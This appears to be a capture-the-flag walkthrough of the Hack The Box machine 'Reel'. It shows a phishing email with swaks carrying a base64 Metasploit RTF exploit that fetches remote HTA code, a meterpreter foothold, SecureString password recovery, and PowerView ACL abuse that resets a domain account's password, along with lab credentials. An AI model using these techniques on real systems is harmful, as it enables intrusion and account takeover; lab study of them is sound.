Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# Nmap 7.91 scan initiated Mon Jul 26 09:36:58 2021 as: /usr/bin/nmap -sCV -p21,22,25,135,139,445,593,49159 --open -oN nmap/Script_10.129.1.151.nmap --system-dns --stats-every 2s 10.129.1.151
Nmap scan report for 10.129.1.151
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=7/26%Time=60FE34EA%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 26 09:45:07 2021 -- 1 IP address (1 host up) scanned in 488.60 seconds
Enumeration
Port 21
Anonymous login was enabled
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
___ $ftp 10.129.1.151
Connected to 10.129.1.151.
220 Microsoft FTP Service
Name (10.129.1.151:bharath): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> mget *
mget AppLocker.docx? y
200 PORT command successful.
125 Data connection already open; Transfer starting.
y
WARNING! 9 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
2047 bytes received in 0.53 secs (3.7484 kB/s)
mget readme.txt? y
200 PORT command successful.
y
125 Data connection already open; Transfer starting.
226 Transfer complete.
124 bytes received in 0.34 secs (0.3611 kB/s)
mget Windows Event Forwarding.docx? y
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 51 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
14581 bytes received in 0.67 secs (21.2071 kB/s)
ftp>
We have three files. One readme and two docx files.
Readme.txt
![[Pasted image 20210726102608.png]](/assets/images/Pasted image 20210726102608.png)
Applocker.docx
![[Pasted image 20210726103201.png]](/assets/images/Pasted image 20210726103201.png)
Windows Event Forwarding.docx seems to be a corrupted file.
![[Pasted image 20210726103239.png]](/assets/images/Pasted image 20210726103239.png)
![[Pasted image 20210726103419.png]](/assets/images/Pasted image 20210726103419.png)
We have a user nico@megabank.com. Let’s make a note of domain and user.
Fixing the corrupted file and reading the contents and see if anything is useful
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
____ $zip -FF windows.zip --out Fixed/out.zip
Fix archive (-FF) - salvage what can
Found end record (EOCDR) - says expect single disk archive
Scanning for entries...
copying: [Content_Types].xml (385 bytes)
copying: _rels/.rels (243 bytes)
copying: word/_rels/document.xml.rels (290 bytes)
copying: word/document.xml (2337 bytes)
copying: word/theme/theme1.xml (1704 bytes)
copying: word/settings.xml (925 bytes)
copying: word/webSettings.xml (258 bytes)
copying: word/stylesWithEffects.xml (1991 bytes)
copying: word/styles.xml (1862 bytes)
copying: word/fontTable.xml (543 bytes)
copying: docProps/app.xml (481 bytes)
Central Directory found...
no local entry: docProps/core.xml
EOCDR found ( 1 14558)...
1
2
3
4
5
6
7
8
9
10
11
12
13
____ $unzip out.zip
Archive: out.zip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/stylesWithEffects.xml bad CRC 28f601f3 (should be 6e6ce0c8)
inflating: word/styles.xml
inflating: word/fontTable.xml
inflating: docProps/app.xml
After extracting the zip file and trying to read word/document.xml.
![[Pasted image 20210726105541.png]](/assets/images/Pasted image 20210726105541.png)
Let’s format and read the information. It’s a huge file. I am only attaching the relavant information.
![[Pasted image 20210726105725.png]](/assets/images/Pasted image 20210726105725.png)
We have a domain. Let’s add it to our /etc/hosts file.
![[Pasted image 20210726110003.png]](/assets/images/Pasted image 20210726110003.png)
Port 25
We can send a mail to nico@megabank.htb which we have from details of the word file found in ftp
We will use swaks tool to send a mail.
1
2
3
4
5
6
7
8
9
10
11
12
____ $telnet 10.129.1.151 25
Trying 10.129.1.151...
Connected to 10.129.1.151.
Escape character is '^]'.
220 Mail Service ready
ehlo megabank.htb
250-REEL
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
VRFY nico@megabank.htb
502 VRFY disallowed.
VRFY is disabled. So we can’t verify if the user exists.
Let’s make a small users.txt file to check whether we can send to any user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat users.txt
nico@megabank.htb
nico@reel.htb
root@reel.htb
tinyb0y@reel.htb
tinyb0y@htb.local
nico@htb.local
nico@wef.htb.local
root@wef.htb.local
tinyb0y@wef.htb.local
administrator@htb.local
administrator@megabank.local
administrator@wef.htb.local
admin@htb.local
admin@megabank.local
admin@wef.htb.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
____ $smtp-user-enum -M RCPT -U users.txt -t 10.129.1.151
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Mon Jul 26 12:53:55 2021 #########
10.129.1.151: tinyb0y@htb.local exists
10.129.1.151: tinyb0y@reel.htb exists
10.129.1.151: nico@reel.htb exists
10.129.1.151: nico@megabank.htb exists
10.129.1.151: root@reel.htb exists
10.129.1.151: nico@htb.local exists
10.129.1.151: nico@wef.htb.local exists
10.129.1.151: root@wef.htb.local exists
10.129.1.151: tinyb0y@wef.htb.local exists
10.129.1.151: administrator@htb.local exists
10.129.1.151: administrator@megabank.local exists
10.129.1.151: admin@megabank.local exists
10.129.1.151: admin@htb.local exists
10.129.1.151: administrator@wef.htb.local exists
10.129.1.151: admin@wef.htb.local exists
######## Scan completed at Mon Jul 26 12:54:00 2021 #########
15 results.
15 queries in 5 seconds (3.0 queries / sec)
So this concludes we can send to any user.
After searching for a while I found an exploit.
Description of Vulnerability This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
Reference: https://www.youtube.com/watch?v=Esg-K4ARzkM https://www.rapid7.com/db/modules/exploit/windows/fileformat/office_word_hta/
![[Pasted image 20210726130704.png]](/assets/images/Pasted image 20210726130704.png)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
____ $swaks --to nico@megabank.htb --header "Subject: test" --body "Please Check the doc file" --attach msf.rtf --server 10.129.1.151
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future. Prefix filenames with '@' instead.
=== Trying 10.129.1.151:25...
=== Connected to 10.129.1.151.
<- 220 Mail Service ready
-> EHLO bharath
<- 250-REEL
<- 250-SIZE 20480000
<- 250-AUTH LOGIN PLAIN
<- 250 HELP
-> MAIL FROM:<bharath@bharath>
<- 250 OK
-> RCPT TO:<nico@megabank.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Mon, 26 Jul 2021 13:03:16 +0530
-> To: nico@megabank.htb
-> From: root@root
-> Subject: test
-> Message-Id: <20210726130316.024887@bharath>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_24887"
->
-> ------=_MIME_BOUNDARY_000_24887
-> Content-Type: text/plain
->
-> Please Check the doc file
-> ------=_MIME_BOUNDARY_000_24887
-> Content-Type: application/octet-stream; name="msf.rtf"
-> Content-Description: msf.rtf
-> Content-Disposition: attachment; filename="msf.rtf"
-> Content-Transfer-Encoding: BASE64
->
-> e1xydGYxXGFkZWZsYW5nMTAyNVxhbnNpXGFuc2ljcGcxMjUyXHVjMVxhZGVmZjMxNTA3XGRlZmYw
-> XHN0c2hmZGJjaDMxNTA1XHN0c2hmbG9jaDMxNTA2XHN0c2hmaGljaDMxNTA2XHN0c2hmYmkzMTUw
-> N1xkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUyXHRoZW1lbGFuZzEwMzNcdGhlbWVsYW5nZmUyMDUy
-> XHRoZW1lbGFuZ2NzMAp7XGluZm8Ke1xhdXRob3IgTWljcm9zb2Z0fQp7XG9wZXJhdG9yIE1pY3Jv
-> c29mdH0KfQp7XCpceG1sbnN0Ymwge1x4bWxuczEgaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNv
-> bS9vZmZpY2Uvd29yZC8yMDAzL3dvcmRtbH19CnsKe1xvYmplY3Rcb2JqYXV0bGlua1xvYmp1cGRh
-> dGVccnNsdHBpY3Rcb2JqdzI5MVxvYmpoMjMwXG9ianNjYWxleDk5XG9ianNjYWxleTEwMQp7XCpc
-> b2JqY2xhc3MgV29yZC5Eb2N1bWVudC44fQp7XCpcb2JqZGF0YSAwMTA1MDAwMDAyMDAwMDAwCjA5
-> MDAwMDAwNGY0YzQ1MzI0YzY5NmU2YjAwMDAwMDAwMDAwMDAwMDAwMDAwMGEwMDAwCmQwY2YxMWUw
-> YTFiMTFhZTEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDNlMDAwMzAwZmVmZjA5MDAw
-> NjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDEwMDAwMDAy
-------
STRIP
-------
-> CjAxMDAwMDAyMDkwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMGE0MDAwMDAw
-> ZTBjOWVhNzlmOWJhY2UxMThjODIwMGFhMDA0YmE5MGI4YzAwMDAwMDY4MDA3NDAwNzQwMDcwMDAz
-> YTAwMmYwMDJmMDAzMTAwMzAwMDJlMDAzMTAwMzAwMDJlMDAzMTAwMzcwMDJlMDAzMTAwMzgwMDM5
-> MDAzYTAwMzgwMDMwMDAzODAwMzAwMDJmMDA2NDAwNjUwMDY2MDA2MTAwNzUwMDZjMDA3NDAwMmUw
-> MDY4MDA3NDAwNjEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA3OTU4ODFmNDNiMWQ3
-> ZjQ4YWYyYzgyNWRjNDg1Mjc2MzAwMDAwMDAwYTVhYjAwMDBmZmZmZmZmZjA2MDkwMjAwMDAwMDAw
-> MDBjMDAwMDAwMDAwMDAwMDQ2MDAwMDAwMDBmZmZmZmZmZjAwMDAwMDAwMDAwMDAwMDA5MDY2NjBh
-> NjM3YjVkMjAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MTAwMjAzMDAwZDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
-> MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAK
-> MDEwNTAwMDAwMDAwMDAwMH0Ke1xyZXN1bHQge1xydGxjaFxmY3MxIFxhZjMxNTA3IFxsdHJjaFxm
-> Y3MwIFxpbnNyc2lkMTk3OTMyNCB9fX19CntcKlxkYXRhc3RvcmUgfQp9Cg==
->
-> ------=_MIME_BOUNDARY_000_24887--
->
->
-> .
<- 250 Queued (12.610 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
![[Pasted image 20210726131129.png]](/assets/images/Pasted image 20210726131129.png)
We have a successful meterpreter sessions. Let’s use the session.
1
2
3
4
5
6
7
8
9
meterpreter > sysinfo
Computer : REEL
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_GB
Domain : HTB
Logged On Users : 6
Meterpreter : x86/windows
meterpreter >
![[Pasted image 20210726131519.png]](/assets/images/Pasted image 20210726131519.png)
We have user flag. Now let’s escalate to Administrator
![[Pasted image 20210726132121.png]](/assets/images/Pasted image 20210726132121.png)
We have an Active Directory on the machine. Port 88,389,636 are generally for AD/LDAP.
We found a cred.xml file which contains a password for tom user with domain HTB
![[Pasted image 20210726132756.png]](/assets/images/Pasted image 20210726132756.png)
Let’s get the password from the secureString
https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
![[Pasted image 20210726135619.png]](/assets/images/Pasted image 20210726135619.png)
1
2
3
$credential = Import-CliXml -Path .\cred.xml
PS > $credential.GetNetworkCredential().Password
1ts-mag1c!!!
User: tom
Pass: 1ts-mag1c!!!
We had SSH port on. Let’s login with these creds
1
2
3
4
5
6
7
8
9
10
____ $ssh tom@10.129.1.151
The authenticity of host '10.129.1.151 (10.129.1.151)' can't be established.
ECDSA key fingerprint is SHA256:jffiqnVqz/MrcDasdsjISFIcN/xtlDj1C76Yu1mDQVY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.1.151' (ECDSA) to the list of known hosts.
tom@10.129.1.151's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>
![[Pasted image 20210726135914.png]](/assets/images/Pasted image 20210726135914.png)
We have some “AD-Audit” directory which has note and BloodHound directory
1
2
3
4
5
6
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
We have BloodHound/SharpHound.ps1
Let’s copy new version of SharpHound on to the box and collect domain information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PS C:\Users\tom\Downloads> dir
Directory: C:\Users\tom\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 7/26/2021 9:53 AM 973735 SharpHound.ps1
PS C:\Users\tom\Downloads> .\SharpHound.ps1
PS C:\Users\tom\Downloads> import-module .\SharpHound.ps1
PS C:\Users\tom\Downloads> invoke-bloodhound -collectionmethod all -domain HTB.LOCAL -LDAPUser tom -LDAPPass '1ts-mag1c!!!'
-----------------------------------------------
Initializing SharpHound at 9:53 AM on 7/26/2021
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
PS C:\Users\tom\Downloads> Status: 0 objects finished (+0) -- Using 102 MB RAM
Status: 84 objects finished (+84 84)/s -- Using 108 MB RAM
Enumeration finished in 00:00:01.5186167
Compressing data to C:\Users\tom\Downloads\20210726095354_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 9:53 AM on 7/26/2021! Happy Graphing!
PS C:\Users\tom\Downloads>
![[Pasted image 20210726142544.png]](/assets/images/Pasted image 20210726142544.png)
Sharphound generates a zip with the all the information of domain which tom user can collect. Let’s spin BloodHound UI on our local machine
![[Pasted image 20210726144044.png]](/assets/images/Pasted image 20210726144044.png)
![[Pasted image 20210726144540.png]](/assets/images/Pasted image 20210726144540.png)
We have three domain administrators
- claire_da
- brad_da
- administrator
![[Pasted image 20210726145341.png]](/assets/images/Pasted image 20210726145341.png)
![[Pasted image 20210726145445.png]](/assets/images/Pasted image 20210726145445.png)
Let’s exploit it.
1
2
3
4
5
6
7
8
9
10
# Make tom owner of claire
> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
# Give all right on claire to tom
> Add-DomainObjectAcl -TargetIdentity claire -Rights All
cmdlet Add-DomainObjectAcl at command pipeline position 1
Supply values for the following parameters:
PrincipalIdentity[0]: tom
Let’s change the password of claire
1
2
3
PS C:\Users\tom\Downloads> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\Users\tom\Downloads> Set-DomainUserPassword -Identity claire -AccountPassword $UserPassword
PS C:\Users\tom\Downloads>
Let’s login with claire account now
1
2
3
4
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>
We are claire on the box now.
![[Pasted image 20210726155556.png]](/assets/images/Pasted image 20210726155556.png)
1
Add-DomainGroupMember -Identity 'Backup_admins' -Members 'claire'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PS C:\Users\claire\Downloads> net user claire
User name claire
Full Name Claire Danes
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/26/2021 11:49:51 AM
Password expires Never
Password changeable 7/27/2021 11:49:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/26/2021 11:35:39 AM
Logon hours allowed All
Local Group Memberships *Hyper-V Administrator
Global Group memberships *Backup_Admins *Domain Users
*MegaBank_Users *DR_Site
*Restrictions
The command completed successfully.
![[Pasted image 20210726162748.png]](/assets/images/Pasted image 20210726162748.png)
We are a member of Backup_Admins now.
We are able to access Administrator account Desktop. But we are not are not able to read root.txt. But we can accesss “Backup_Scripts” directory
![[Pasted image 20210726165734.png]](/assets/images/Pasted image 20210726165734.png)
![[Pasted image 20210726165705.png]](/assets/images/Pasted image 20210726165705.png)
password: Cr4ckMeIfYouC4n!
Login with administrator user with the password obtained
![[Pasted image 20210726165958.png]](/assets/images/Pasted image 20210726165958.png)
YAY! We have administrator access.